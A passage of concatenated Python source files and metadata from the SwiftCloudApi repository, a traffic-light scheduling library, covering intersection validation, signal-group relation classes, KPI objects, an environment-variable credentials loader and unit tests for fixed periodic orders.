other_relation_dict[\"to_start_gy\"] is True:\n if other_relation_dict[\"min_time\"] == other_relation_dict[\"max_time\"]:\n if other_relation_dict[\"min_time\"] == 0: # sync start\n sync_starts.append(SyncStart.from_json(sync_start_dict=other_relation_dict))\n else: # offset\n offsets.append(Offset.from_json(offset_dict=other_relation_dict))\n else: # greenyellow-leads\n greenyellow_leads.append(GreenyellowLead.from_json(json_dict=other_relation_dict))\n elif other_relation_dict[\"from_start_gy\"] is False and other_relation_dict[\"to_start_gy\"] is False:\n greenyellow_trails.append(GreenyellowTrail.from_json(json_dict=other_relation_dict))\n\n return Intersection(signalgroups=signalgroups, conflicts=conflicts, sync_starts=sync_starts,\n offsets=offsets, greenyellow_leads=greenyellow_leads, greenyellow_trails=greenyellow_trails,\n periodic_orders=periodic_orders)\n\n @staticmethod\n def from_swift_mobility_export(json_path) -> Intersection:\n \"\"\"\n Loading intersection from json-file exported from Swift Mobility Desktop\n :param json_path: path to json file\n :return: intersection object\n \"\"\"\n with open(json_path, \"r\") as f:\n json_dict = json.load(f)\n\n # the json structure conforms with the expected structure; it only contains additional information (which is\n # ignored).\n return Intersection.from_json(intersection_dict=json_dict[\"intersection\"])\n\n def _validate(self) -> None:\n \"\"\"\n validate the arguments provided to this object\n :return: - (raises ValueError or TypeError if validation does not pass)\n \"\"\"\n self._validate_types()\n self._validate_ids()\n self._validate_relations_per_pair()\n self._validate_setup_times()\n self._validate_periodic_orders()\n\n def _validate_types(self):\n \"\"\"\n validate the datatypes of the arguments\n \"\"\"\n # signalgroups\n if not isinstance(self.signalgroups, list):\n raise TypeError(\"signalgroups should be a list of SignalGroup objects\")\n for signalgroup in self.signalgroups:\n if not isinstance(signalgroup, SignalGroup):\n raise TypeError(\"signalgroups should be a list of SignalGroup objects\")\n\n # conflicts\n if not isinstance(self.conflicts, list):\n raise TypeError(\"conflicts should be a list of Conflict objects\")\n for conflict in self.conflicts:\n if not isinstance(conflict, Conflict):\n raise TypeError(\"conflicts should be a list of Conflict objects\")\n\n # sync starts\n if not isinstance(self.sync_starts, list):\n raise TypeError(\"sync_start should be a list of SyncStart objects\")\n for sync_start in self.sync_starts:\n if not isinstance(sync_start, SyncStart):\n raise TypeError(\"sync_start should be a list of SyncStart objects\")\n\n # offsets\n if not isinstance(self.offsets, list):\n raise TypeError(\"offsets should be a list of Offset objects\")\n for offset in self.offsets:\n if not isinstance(offset, Offset):\n raise TypeError(\"offset should be a list of Coordination objects\")\n\n # greenyellow_leads\n if not isinstance(self.greenyellow_leads, list):\n raise TypeError(\"greenyellow-lead should be a list of GreenyellowLead objects\")\n for greenyellow_lead in self.greenyellow_leads:\n if not isinstance(greenyellow_lead, GreenyellowLead):\n raise TypeError(\"greenyellow-lead should be a list of GreenyellowLead objects\")\n\n # greenyellow_trails\n if not isinstance(self.greenyellow_trails, list):\n raise TypeError(\"greenyellow-trail should be a list of GreenyellowTrail objects\")\n for greenyellow_trail in self.greenyellow_trails:\n if not isinstance(greenyellow_trail, GreenyellowTrail):\n raise TypeError(\"greenyellow-lead should be a list of GreenyellowTrail objects\")\n\n def _validate_ids(self):\n \"\"\"\n validate ids used in signalgroups (uniqueness) and conflicts\n \"\"\"\n # validate unique ids\n ids = [signalgroup.id for signalgroup in self.signalgroups]\n unique_ids = set(ids)\n if len(unique_ids) != len(ids):\n raise ValueError(\"signalgroup ids should be unique\")\n\n # check existence ids used in conflicts\n for conflict in self.conflicts:\n if conflict.id1 not in unique_ids:\n raise ValueError(f\"Unknown signalgoup id '{conflict.id1}' used in conflict\")\n if conflict.id2 not in unique_ids:\n raise ValueError(f\"Unknown signalgoup id '{conflict.id2}' used in conflict\")\n\n for other_relation in self.other_relations:\n if other_relation.from_id not in unique_ids:\n raise ValueError(f\"Unknown signalgoup id '{other_relation.from_id}' \"\n f\"used in object {other_relation.__class__}\")\n if other_relation.to_id not in unique_ids:\n raise ValueError(f\"Unknown signalgoup id '{other_relation.to_id}' \"\n f\"used in object {other_relation.__class__}\")\n\n def _validate_relations_per_pair(self):\n # check uniqueness of the specified conflicts\n num_conflicts = len(self.conflicts)\n num_unique_conflicts = len({frozenset([conflict.id1, conflict.id2]) for conflict in self.conflicts})\n if num_conflicts != num_unique_conflicts:\n raise ValueError(\"Conflicts may not contain duplicate {id1, id2} pairs.\")\n\n # check at most one other-relation specified between each two events.\n other_relation_intervals_encountered = set()\n for other_relation in self.other_relations:\n if isinstance(other_relation, (Offset, SyncStart, GreenyellowLead)):\n from_switch_str = \"green\"\n to_switch_str = \"green\"\n elif isinstance(other_relation, GreenyellowTrail):\n from_switch_str = \"red\"\n to_switch_str = \"red\"\n else:\n raise NotImplementedError(\"Unknown type of other-relations relation\")\n\n other_relation_interval = frozenset([other_relation.from_id, from_switch_str,\n other_relation.to_id, to_switch_str])\n if other_relation_interval in other_relation_intervals_encountered:\n raise ValueError(f\"Multiple other-relations given between the switch to {from_switch_str}\"\n f\"of SG {other_relation.from_id} to the switch to {to_switch_str} \"\n f\"of SG {other_relation.to_id}. This is not allowed.\")\n\n def _validate_setup_times(self):\n # validate setup times are not too negative\n id_to_signalgroup = {signalgroup.id: signalgroup for signalgroup in self.signalgroups}\n for conflict in self.conflicts:\n # this we catch in another validation step\n if conflict.id1 not in id_to_signalgroup or conflict.id2 not in id_to_signalgroup:\n continue\n signalgroup1 = id_to_signalgroup[conflict.id1]\n signalgroup2 = id_to_signalgroup[conflict.id2]\n if signalgroup1.min_greenyellow + conflict.setup12 <= 0:\n raise ValueError(f\"setup12 plus min_greenyellow of signal group sg1 must be strictly positive, \"\n f\"which is not satisfied for signal groups sg1='{conflict.id1}' \"\n f\"and sg2='{conflict.id2}'.\")\n if signalgroup2.min_greenyellow + conflict.setup21 <= 0:\n raise ValueError(f\"setup21 plus min_greenyellow of signal group sg2 must be strictly positive, \"\n f\"which is not satisfied for signal groups sg1='{conflict.id1}' \"\n f\"and sg2='{conflict.id2}'.\")\n\n def _validate_periodic_orders(self):\n signalgroup_ids = {signalgroup.id for signalgroup in self.signalgroups}\n conflict_ids = {frozenset([conflict.id1, conflict.id2]) for conflict in self.conflicts}\n for periodic_order in self.periodic_orders:\n if not isinstance(periodic_order, PeriodicOrder):\n raise TypeError(\"periodic_order should be an instance of PeriodicOrder\")\n prev_signalgroup_id = periodic_order.order[-1]\n for signalgroup_id in periodic_order:\n if signalgroup_id not in signalgroup_ids:\n raise ValueError(f\"Order {periodic_order} uses an unknown signalgroup id {signalgroup_id}\")\n if frozenset([prev_signalgroup_id, signalgroup_id]) not in conflict_ids:\n raise ValueError(f\"Each two subsequent signalgroups in a periodic order should be conflicting. \"\n f\"This does not hold for {prev_signalgroup_id} and {signalgroup_id} in \"\n f\"order {periodic_order}\")\n\n prev_signalgroup_id = signalgroup_id\n"
},
{
"alpha_fraction": 0.6569200754165649,
"alphanum_fraction": 0.6569200754165649,
"avg_line_length": 26,
"blob_id": "1e86b88f0531789d5bae495dfc0f573970c416b9",
"content_id": "6606a4f26a526c3f99dee2735ee9445af766aa9a",
"detected_licenses": [
"MIT",
"LicenseRef-scancode-other-permissive"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 513,
"license_type": "permissive",
"max_line_length": 104,
"num_lines": 19,
"path": "/swift_cloud_py/authentication/credentials.py",
"repo_name": "stijnfleuren/SwiftCloudApi",
"src_encoding": "UTF-8",
"text": "import os\n\n\nclass Credentials:\n \"\"\"\n credentials retrieved from environment variables\n \"\"\"\n def __init__(self):\n # swift mobility cloud credentials from environment variables to prevent hard-coding credentials\n self._access_key = os.environ.get(\"smc_api_key\")\n self._secret_access_key = os.environ.get(\"smc_api_secret\")\n\n @property\n def access_key(self):\n return self._access_key\n\n @property\n def secret_access_key(self):\n return self._secret_access_key\n"
},
{
"alpha_fraction": 0.603080153465271,
"alphanum_fraction": 0.6343483924865723,
"avg_line_length": 48.25862121582031,
"blob_id": "bf7025cb377afe6684f713125bfd3652b95e702d",
"content_id": "06f3f1c6022f3873e98f31fddcc3bce8638a56a9",
"detected_licenses": [
"MIT",
"LicenseRef-scancode-other-permissive"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8571,
"license_type": "permissive",
"max_line_length": 106,
"num_lines": 174,
"path": "/swift_cloud_py/validate_safety_restrictions/test/test_validation_of_fixed_order.py",
"repo_name": "stijnfleuren/SwiftCloudApi",
"src_encoding": "UTF-8",
"text": "import unittest\nfrom collections import defaultdict\nfrom itertools import combinations\nfrom typing import List\n\nfrom swift_cloud_py.common.errors import SafetyViolation\nfrom swift_cloud_py.entities.control_output.fixed_time_schedule import FixedTimeSchedule\nfrom swift_cloud_py.entities.intersection.intersection import Intersection\nfrom swift_cloud_py.entities.intersection.periodic_order import PeriodicOrder\nfrom swift_cloud_py.entities.intersection.sg_relations import Conflict\nfrom swift_cloud_py.entities.intersection.signalgroup import SignalGroup\nfrom swift_cloud_py.entities.intersection.traffic_light import TrafficLight\nfrom swift_cloud_py.validate_safety_restrictions.validate_fixed_orders import validate_fixed_orders\n\n\nclass TestValidatingCompleteness(unittest.TestCase):\n \"\"\" Unittests of the function find_other_sg_relation_matches \"\"\"\n\n def setUp(self) -> None:\n self._signal_groups = []\n self._fixed_orders = []\n self._greenyellow_intervals = defaultdict(list)\n self._period = None\n\n def test_three_signalgroups_valid(self):\n self._add_signalgroup(name=\"sg1\")\n self._add_signalgroup(name=\"sg2\")\n self._add_signalgroup(name=\"sg3\")\n self._add_greenyellow_interval(name=\"sg1\", start=2, end=10)\n self._add_greenyellow_interval(name=\"sg2\", start=12, end=20)\n self._add_greenyellow_interval(name=\"sg3\", start=22, end=30)\n self._add_fixed_periodic_order(order=[\"sg1\", \"sg2\", \"sg3\"])\n self._set_period(period=40)\n self._expect_valid_fixed_order()\n\n def test_three_signalgroups_not_valid(self):\n self._add_signalgroup(name=\"sg1\")\n self._add_signalgroup(name=\"sg2\")\n self._add_signalgroup(name=\"sg3\")\n self._add_greenyellow_interval(name=\"sg1\", start=2, end=10)\n self._add_greenyellow_interval(name=\"sg2\", start=12, end=20)\n self._add_greenyellow_interval(name=\"sg3\", start=22, end=30)\n self._add_fixed_periodic_order(order=[\"sg1\", \"sg3\", \"sg2\"])\n self._set_period(period=40)\n self._expect_valid_fixed_order(expect_valid=False)\n\n def test_shift_invariance_valid(self) -> None:\n self._add_signalgroup(name=\"sg1\")\n self._add_signalgroup(name=\"sg2\")\n self._add_signalgroup(name=\"sg3\")\n self._set_period(period=40)\n self._add_greenyellow_interval(name=\"sg1\", start=2, end=10)\n self._add_greenyellow_interval(name=\"sg2\", start=12, end=20)\n self._add_greenyellow_interval(name=\"sg3\", start=22, end=30)\n self._add_fixed_periodic_order(order=[\"sg1\", \"sg2\", \"sg3\"])\n\n for shift in [shift for shift in range(0, 50, 1)]:\n with self.subTest(f\"shift={shift}\"):\n self._expect_valid_fixed_order(shift=shift)\n\n def test_shift_invariance_not_valid(self) -> None:\n self._add_signalgroup(name=\"sg1\")\n self._add_signalgroup(name=\"sg2\")\n self._add_signalgroup(name=\"sg3\")\n self._add_greenyellow_interval(name=\"sg1\", start=2, end=10)\n self._add_greenyellow_interval(name=\"sg2\", start=12, end=20)\n self._add_greenyellow_interval(name=\"sg3\", start=22, end=30)\n self._add_fixed_periodic_order(order=[\"sg1\", \"sg3\", \"sg2\"])\n self._set_period(period=40)\n\n for shift in [shift for shift in range(0, 50, 1)]:\n with self.subTest(f\"shift={shift}\"):\n self._expect_valid_fixed_order(shift=shift, expect_valid=False)\n\n def test_four_signalgroups_valid(self):\n self._add_signalgroup(name=\"sg1\")\n self._add_signalgroup(name=\"sg2\")\n self._add_signalgroup(name=\"sg3\")\n self._add_signalgroup(name=\"sg4\")\n self._add_greenyellow_interval(name=\"sg1\", start=2, end=10)\n self._add_greenyellow_interval(name=\"sg2\", start=12, end=20)\n self._add_greenyellow_interval(name=\"sg3\", start=22, end=30)\n self._add_greenyellow_interval(name=\"sg4\", start=32, end=40)\n self._add_fixed_periodic_order(order=[\"sg1\", \"sg2\", \"sg3\"])\n self._add_fixed_periodic_order(order=[\"sg1\", \"sg3\", \"sg4\"])\n self._set_period(period=50)\n\n for shift in [shift for shift in range(0, 60, 1)]:\n with self.subTest(f\"shift={shift}\"):\n self._expect_valid_fixed_order(shift=shift)\n\n def test_four_signalgroups_invalid(self):\n self._add_signalgroup(name=\"sg1\")\n self._add_signalgroup(name=\"sg2\")\n self._add_signalgroup(name=\"sg3\")\n self._add_signalgroup(name=\"sg4\")\n self._add_greenyellow_interval(name=\"sg1\", start=2, end=10)\n self._add_greenyellow_interval(name=\"sg2\", start=12, end=20)\n self._add_greenyellow_interval(name=\"sg3\", start=22, end=30)\n self._add_greenyellow_interval(name=\"sg4\", start=32, end=40)\n self._add_fixed_periodic_order(order=[\"sg1\", \"sg2\", \"sg3\"])\n self._add_fixed_periodic_order(order=[\"sg1\", \"sg4\", \"sg3\"])\n self._set_period(period=50)\n\n for shift in [shift for shift in range(0, 60, 1)]:\n with self.subTest(f\"shift={shift}\"):\n self._expect_valid_fixed_order(shift=shift, expect_valid=False)\n\n def test_multiple_greenyellow_intervals_valid(self):\n self._add_signalgroup(name=\"sg1\")\n self._add_signalgroup(name=\"sg2\")\n self._add_signalgroup(name=\"sg3\")\n self._add_greenyellow_interval(name=\"sg1\", start=2, end=10)\n self._add_greenyellow_interval(name=\"sg1\", start=12, end=20)\n self._add_greenyellow_interval(name=\"sg2\", start=22, end=30)\n self._add_greenyellow_interval(name=\"sg2\", start=32, end=40)\n self._add_greenyellow_interval(name=\"sg3\", start=42, end=50)\n self._add_greenyellow_interval(name=\"sg3\", start=52, end=60)\n self._add_fixed_periodic_order(order=[\"sg1\", \"sg2\", \"sg3\"])\n self._set_period(period=70)\n self._expect_valid_fixed_order()\n\n def test_multiple_greenyellow_intervals_not_valid(self):\n self._add_signalgroup(name=\"sg1\")\n self._add_signalgroup(name=\"sg2\")\n self._add_signalgroup(name=\"sg3\")\n self._add_greenyellow_interval(name=\"sg1\", start=2, end=10)\n self._add_greenyellow_interval(name=\"sg3\", start=12, end=20)\n self._add_greenyellow_interval(name=\"sg2\", start=22, end=30)\n self._add_greenyellow_interval(name=\"sg2\", start=32, end=40)\n self._add_greenyellow_interval(name=\"sg3\", start=42, end=50)\n self._add_greenyellow_interval(name=\"sg1\", start=52, end=60)\n self._add_fixed_periodic_order(order=[\"sg1\", \"sg2\", \"sg3\"])\n self._set_period(period=70)\n self._expect_valid_fixed_order(expect_valid=False)\n\n def _add_greenyellow_interval(self, name: str, start: float, end: float) -> None:\n self._greenyellow_intervals[name].append([start, end])\n\n def _add_fixed_periodic_order(self, order: List[str]) -> None:\n self._fixed_orders.append(PeriodicOrder(order=order))\n\n def _set_period(self, period: float) -> None:\n self._period = period\n\n def _add_signalgroup(self, name: str) -> None:\n traffic_light = TrafficLight(capacity=0.5, lost_time=0.0)\n self._signal_groups.append(SignalGroup(id=name, traffic_lights=[traffic_light],\n min_greenyellow=2, max_greenyellow=20, min_red=2,\n max_red=50, min_nr=1, max_nr=3))\n\n def _expect_valid_fixed_order(self, expect_valid: bool = True, shift: float = 0) -> None:\n # assume all signalgroups are conflicting for this test\n conflicts = []\n for signalgroup1, signalgroup2 in combinations(self._signal_groups, 2):\n if signalgroup1 == signalgroup2:\n continue\n conflicts.append(Conflict(id1=signalgroup1.id, id2=signalgroup2.id, setup12=1, setup21=1))\n intersection = Intersection(signalgroups=self._signal_groups, conflicts=conflicts,\n periodic_orders=self._fixed_orders)\n\n fts_dict = {\"period\": self._period,\n \"greenyellow_intervals\": {name: [[(t + shift) % self._period for t in interval]\n for interval in intervals]\n for name, intervals in self._greenyellow_intervals.items()}}\n\n fts = FixedTimeSchedule.from_json(fts_dict=fts_dict)\n valid = True\n try:\n validate_fixed_orders(intersection=intersection, fts=fts)\n except SafetyViolation:\n valid = False\n\n self.assertEqual(valid, expect_valid)\n"
},
{
"alpha_fraction": 0.7669491767883301,
"alphanum_fraction": 0.7686440944671631,
"avg_line_length": 52.6363639831543,
"blob_id": "9f8267dcf7898d078b987df42436d0f0d934b88b",
"content_id": "a12ce3cf28ce8add0ca3faf22955b4eb63fcb8c5",
"detected_licenses": [
"MIT",
"LicenseRef-scancode-other-permissive"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1180,
"license_type": "permissive",
"max_line_length": 116,
"num_lines": 22,
"path": "/swift_cloud_py/validate_safety_restrictions/validate_completeness.py",
"repo_name": "stijnfleuren/SwiftCloudApi",
"src_encoding": "UTF-8",
"text": "\"\"\"\nValidate that all of the signal groups are included\n\"\"\"\nfrom swift_cloud_py.common.errors import SafetyViolation\nfrom swift_cloud_py.entities.control_output.fixed_time_schedule import FixedTimeSchedule\nfrom swift_cloud_py.entities.intersection.intersection import Intersection\n\n\ndef validate_completeness(intersection: Intersection, fts: FixedTimeSchedule):\n \"\"\"\n Ensures that greenyellow intervals are specified for all signalgroups\n :param intersection: intersection object containing the signal groups for which the greenyellow intervals should\n be specified\n :param fts: fixed-time schedule to validate\n :raises SafetyViolation if validations fail\n \"\"\"\n for signalgroup in intersection.signalgroups:\n if not fts.includes_signalgroup(signalgroup=signalgroup):\n raise SafetyViolation(f\"No greenyellow intervals specified for {signalgroup.id}\")\n # if the signal group is included in the schedule, then check if the number of greenyellow intervals is >= 1\n if len(fts.get_greenyellow_intervals(signalgroup=signalgroup)) == 0:\n raise SafetyViolation(f\"No greenyellow intervals specified for {signalgroup.id}\")\n"
},
{
"alpha_fraction": 0.6874843835830688,
"alphanum_fraction": 0.6889832615852356,
"avg_line_length": 52.019866943359375,
"blob_id": "3b9eceb96d8c70ef4cb6ac94f862cab6a124a941",
"content_id": "70eb6a7545b19abe87b3f0e4a2d3a1e940b66237",
"detected_licenses": [
"MIT",
"LicenseRef-scancode-other-permissive"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8006,
"license_type": "permissive",
"max_line_length": 120,
"num_lines": 151,
"path": "/swift_cloud_py/validate_safety_restrictions/validate_other_sg_relations.py",
"repo_name": "stijnfleuren/SwiftCloudApi",
"src_encoding": "UTF-8",
"text": "from typing import Optional, Union, List\n\nfrom swift_cloud_py.common.errors import SafetyViolation\nfrom swift_cloud_py.entities.intersection.intersection import Intersection\nfrom swift_cloud_py.entities.control_output.fixed_time_schedule import FixedTimeSchedule\nfrom swift_cloud_py.entities.intersection.sg_relations import SyncStart, Offset, GreenyellowLead, GreenyellowTrail\n\nUNKNOWN_TYPE_OTHER_RELATION = \"Unkown type of other_relation\"\n\n\ndef validate_other_sg_relations(intersection: Intersection, fts: FixedTimeSchedule, tolerance: float = 10**(-2)):\n \"\"\"\n Ensure all sync starts, offsets and greenyellow-leads are satisfied.\n :param intersection: intersection containing these inter signal group relations\n :param fts: fixed-time schedule to validate\n :param tolerance: tolerance in seconds for violating safety restrictions\n :raises ValueError if validations fail\n \"\"\"\n for other_relation in intersection.other_relations: # loop over all other-relations\n shift = get_other_sg_relation_shift(other_relation=other_relation, fts=fts, tolerance=tolerance)\n if shift is None:\n raise SafetyViolation(\n f\"{other_relation.__class__} between '{other_relation.from_id}' and {other_relation.to_id}' are \"\n f\"not satisfied.\")\n\n\ndef get_other_sg_relation_shift(other_relation: Union[Offset, GreenyellowLead, SyncStart], fts: FixedTimeSchedule,\n tolerance: float = 10**(-2)) -> Optional[int]:\n \"\"\"\n Find a shift 'shift' of the greenyellow intervals such that the specified inter signal group relation is satisfied\n for each pair {(id_from, index), (id_to, index + shift)} of greenyellow intervals of signal groups id_from and\n id_to, where (id, index) refers to the greenyellow interval with index 'index' of signal group with id 'id'.\n :param other_relation: the inter signal group relation for which we want to find the shift.\n :param fts: fixed-time schedule.\n :param tolerance: tolerance in seconds for violating safety restrictions\n :return: the shift (None if no such shift can be found).\n \"\"\"\n # Get the greenyellow intervals of the associated signal groups\n intervals_from = fts.get_greenyellow_intervals(signalgroup=other_relation.from_id)\n intervals_to = fts.get_greenyellow_intervals(signalgroup=other_relation.to_id)\n\n if len(intervals_from) != len(intervals_to):\n raise SafetyViolation(\n f\"Signal groups {other_relation.__class__} should have the same number of GreenYellowPhases;\"\n f\"this is not satisfied for signalgroups {other_relation.from_id} and {other_relation.to_id}\")\n\n # Matrix of size len(intervals_to) x len(intervals_from)\n matches = [[False] * len(intervals_to)] * len(intervals_from)\n\n # for each greenyellow interval of signal group with id 'other_relation.from_id' we try to find which of the\n # greenyellow intervals of the signal group with id 'other_relation.to_id' satisfy the specified inter signal group\n # relation w.r.t. this greenyellow interval\n for index_from, interval_from in enumerate(intervals_from):\n matches[index_from] = find_other_sg_relation_matches(other_relation=other_relation, fts=fts,\n index_from=index_from, tolerance=tolerance)\n\n # does an unambiguous shift (reindexing) of the greenyellow intervals of signal group with id 'other_relation.to_id'\n # exist\n return get_shift_of_one_to_one_match(matches=matches)\n\n\ndef get_shift_of_one_to_one_match(matches: List[List[bool]]) -> Optional[int]:\n \"\"\"\n Matches is an n x n matrix representing a directed bipartite graph.\n Item i is connected to item j if matches[i][j] = True\n We try to find a shift k such that each item i is matched to an item j + shift\n\n usecase:\n for other_relations a shift 'shift' of the greenyellow intervals must exist such that other_relation is satisfied\n for each pair {(id_from, index), (id_to, index + shift)} of greenyellow intervals of signal groups id_from and\n id_to.\n :param matches: n x n matrix\n :return: shift or None if no such shift can be found\n :raises ValueError when matches is not an nxn boolean matrix\n \"\"\"\n value_error_message = \"matches should be an nxn boolean matrix\"\n n = len(matches)\n if not isinstance(matches, list):\n raise ValueError(value_error_message)\n for row in matches:\n if not isinstance(matches, list) or len(row) != n:\n raise ValueError(value_error_message)\n if not all(isinstance(item, bool) for item in row):\n raise ValueError(value_error_message)\n\n for shift in range(n):\n # example:\n # suppose matches equals:\n # [[False, True, False], [False, False, True],[True, False, False]]\n # then a shift of 1 to the left would give\n # np.array([[True, False, False], [False, True, False],[False, False, True]])\n # this has all diagonal elements\n # below we do this check more efficiently for a shift of 'shift' to the left.\n if all(matches[row][(row + shift) % n] for row in range(n)):\n return shift\n return None\n\n\ndef find_other_sg_relation_matches(other_relation: Union[SyncStart, Offset, GreenyellowLead, GreenyellowTrail],\n fts: FixedTimeSchedule, index_from: int, tolerance: float = 10**(-2)) -> List[bool]:\n \"\"\"\n Find the greenyellow intervals of the signal group with id 'other_relation.to_id' that satisfies the specified\n inter signalgroup relation w.r.t. the greenyellow interval of signal group other_relation.from_id at index\n 'index_from'\n :param other_relation: the other relation (sync start, offset or greenyellow-lead)\n :param fts: fixed-time schedule\n :param index_from: see above\n :param tolerance: tolerance in seconds for violating safety restrictions\n :return: boolean list indicating the matches.\n \"\"\"\n # Get the greenyellow intervals of the associated signal groups\n interval_from = fts.get_greenyellow_interval(signalgroup=other_relation.from_id, k=index_from)\n intervals_to = fts.get_greenyellow_intervals(signalgroup=other_relation.to_id)\n\n matches = [False] * len(intervals_to)\n\n if isinstance(other_relation, (SyncStart, Offset, GreenyellowLead)):\n time_from = interval_from.start_greenyellow\n elif isinstance(other_relation, GreenyellowTrail):\n time_from = interval_from.end_greenyellow\n else:\n raise ValueError(UNKNOWN_TYPE_OTHER_RELATION)\n for index_to in range(len(intervals_to)):\n if isinstance(other_relation, (SyncStart, Offset, GreenyellowLead)):\n time_to = intervals_to[index_to].start_greenyellow\n elif isinstance(other_relation, GreenyellowTrail):\n time_to = intervals_to[index_to].end_greenyellow\n else:\n raise ValueError(UNKNOWN_TYPE_OTHER_RELATION)\n\n # determine the desired range of the time between time_from and time_to.\n if isinstance(other_relation, SyncStart):\n min_time = 0\n max_time = 0\n elif isinstance(other_relation, Offset):\n min_time = other_relation.seconds\n max_time = other_relation.seconds\n elif isinstance(other_relation, (GreenyellowLead, GreenyellowTrail)):\n min_time = other_relation.min_seconds\n max_time = other_relation.max_seconds\n else:\n raise ValueError(UNKNOWN_TYPE_OTHER_RELATION)\n\n # Determine the actual time between time_from and time_to. We correct for min_time potentially being negative.\n time_between = (time_to - time_from - (min_time - tolerance)) % fts.period + (min_time - tolerance)\n\n # Note that result is time_between in [other_relation.min_time, other_relation.min_time + period]\n if min_time - tolerance < time_between < max_time + tolerance:\n matches[index_to] = True\n\n return matches\n"
},
{
"alpha_fraction": 0.6519173979759216,
"alphanum_fraction": 0.6617502570152283,
"avg_line_length": 39.68000030517578,
"blob_id": "2fa37cd342fe463d01248177d12703b8b3b18e82",
"content_id": "1708a8f5d66ea774836151dfede676b04d3f2fec",
"detected_licenses": [
"MIT",
"LicenseRef-scancode-other-permissive"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1017,
"license_type": "permissive",
"max_line_length": 119,
"num_lines": 25,
"path": "/swift_cloud_py/entities/kpis/kpis.py",
"repo_name": "stijnfleuren/SwiftCloudApi",
"src_encoding": "UTF-8",
"text": "from typing import Dict\n\n\nclass KPIs:\n def __init__(self, delay: float, capacity: float):\n \"\"\"\n :param delay: estimation of the the delay (in seconds) that road users are expected to experience at the\n intersection.\n :param capacity: the largest increase in traffic that the intersection is expected to be able to handle.\n For example, capacity=1.1 would indicate that the intersection can handle a 10% increase in traffic, while\n capacity=0.9 indicates that the intersection is already oversaturated (and this amount of traffic has to reduce\n by 10% for the intersection to become 'stable' again).\n \"\"\"\n self.delay = delay\n self.capacity = capacity\n\n def to_json(self):\n return {\"delay\": self.delay, \"capacity\": self.capacity}\n\n @classmethod\n def from_json(cls, json_dict: Dict[str, float]):\n return cls(**json_dict)\n\n def __repr__(self):\n return f\"KPIs: delay={self.delay:.2f}s, capacity={self.capacity:.3f}\"\n"
},
{
"alpha_fraction": 0.6134873032569885,
"alphanum_fraction": 0.6215131878852844,
"avg_line_length": 46.520931243896484,
"blob_id": "d273838cf7313a1d576c9036c6ff29f48f114ac8",
"content_id": "bd99685367562725bc44310a953102414640d891",
"detected_licenses": [
"MIT",
"LicenseRef-scancode-other-permissive"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 10217,
"license_type": "permissive",
"max_line_length": 124,
"num_lines": 215,
"path": "/swift_cloud_py/entities/intersection/sg_relations.py",
"repo_name": "stijnfleuren/SwiftCloudApi",
"src_encoding": "UTF-8",
"text": "from __future__ import annotations # allows using a class as typing inside the same class\nfrom typing import Dict\n\n\nclass Conflict:\n def __init__(self, id1: str, id2: str, setup12: float, setup21: float) -> None:\n \"\"\"\n A conflict between two signal groups; this indicates that the corresponding traffic streams are conflicting and\n may not simultaneously cross the intersection.\n :param id1: id of signal group\n :param id2: id of signal group\n :param setup12: minimum time between the end of a greenyellow interval of signal group id1 and the start of\n a greenyellow interval of signal group id2.\n :param setup21: minimum time between the end of a greenyellow interval of signal group id2 and the start of\n a greenyellow interval of signal group id1.\n \"\"\"\n # by converting to the correct data type we ensure correct types are used\n self.id1 = str(id1)\n self.id2 = str(id2)\n self.setup12 = float(setup12) # defined as time from end gy of sg with id1 to start gy of sg with id2\n self.setup21 = float(setup21)\n\n # validate values of arguments\n self._validate()\n\n def to_json(self) -> Dict:\n \"\"\"get dictionary structure that can be stored as json with json.dumps()\"\"\"\n return self.__dict__\n\n @staticmethod\n def from_json(conflict_dict: Dict) -> Conflict:\n \"\"\"Loading conflict from json (expected same json structure as generated with to_json)\"\"\"\n return Conflict(id1=conflict_dict[\"id1\"],\n id2=conflict_dict[\"id2\"],\n setup12=conflict_dict[\"setup12\"],\n setup21=conflict_dict[\"setup21\"])\n\n def _validate(self):\n \"\"\" Validate input arguments of Confict \"\"\"\n if not self.id1 != self.id2:\n raise ValueError(\"ids of conflict must be different\")\n if not self.setup12 + self.setup21 >= 0:\n raise ValueError(\"setup12+setup21 must be non-negative\")\n\n\nclass SyncStart:\n def __init__(self, from_id: str, to_id: str) -> None:\n \"\"\"\n Force synchronous start (of each greenyellow interval)\n between two signal groups (the ones with id 'from_id' and 'to_id').\n\n Note: This also forces the number of greenyellow intervals to be the same for both signal groups\n :param from_id: name of signalgroup\n :param to_id: name of signalgroup\n \"\"\"\n # by converting to the correct data type we ensure correct types are used\n self.from_id = str(from_id)\n self.to_id = str(to_id)\n\n # store unambiguously\n if self.from_id < self.to_id:\n self.to_id, self.from_id = self.from_id, self.to_id\n\n self._validate()\n\n def to_json(self) -> Dict:\n \"\"\"get dictionary structure that can be stored as json with json.dumps()\"\"\"\n return {\"from_id\": self.from_id, \"from_start_gy\": True,\n \"to_id\": self.to_id, \"to_start_gy\": True,\n \"min_time\": 0.0, \"max_time\": 0.0, \"same_start_phase\": True}\n\n @staticmethod\n def from_json(sync_start_dict: Dict) -> SyncStart:\n \"\"\"Loading synchronous start from json (expected same json structure as generated with to_json)\"\"\"\n assert sync_start_dict[\"min_time\"] == sync_start_dict[\"max_time\"] == 0, \\\n \"trying to load SyncStart from dictionary, but the provided dictionary is not a synchronous start!\"\n return SyncStart(from_id=sync_start_dict[\"from_id\"],\n to_id=sync_start_dict[\"to_id\"])\n\n def _validate(self):\n \"\"\" Validate input arguments of SyncStart \"\"\"\n if not self.from_id != self.to_id:\n raise ValueError(\"ids of sync-start must be different\")\n\n\nclass Offset:\n def __init__(self, from_id: str, to_id: str, seconds: float) -> None:\n \"\"\"\n Force an offset of 'offset' seconds between the start (of each greenyellow interval) of\n signalgroup with id 'from_id' and the start (of each greenyellow interval) of the signalgroup with id 'to_id'.\n (the ones with id 'from_id' and 'to_id').\n :param from_id: name of signalgroup\n :param to_id: name of signalgroup\n :param seconds: The exact number of seconds forced between the start of the greenyellow interval of\n signal group 'from_id' to the greenyellow interval of signal group 'to_id'\n\n Note: This also forces the number of greenyellow intervals to be the same for both signal groups\n \"\"\"\n # by converting to the correct data type we ensure correct types are used\n self.from_id = str(from_id)\n self.to_id = str(to_id)\n self.seconds = 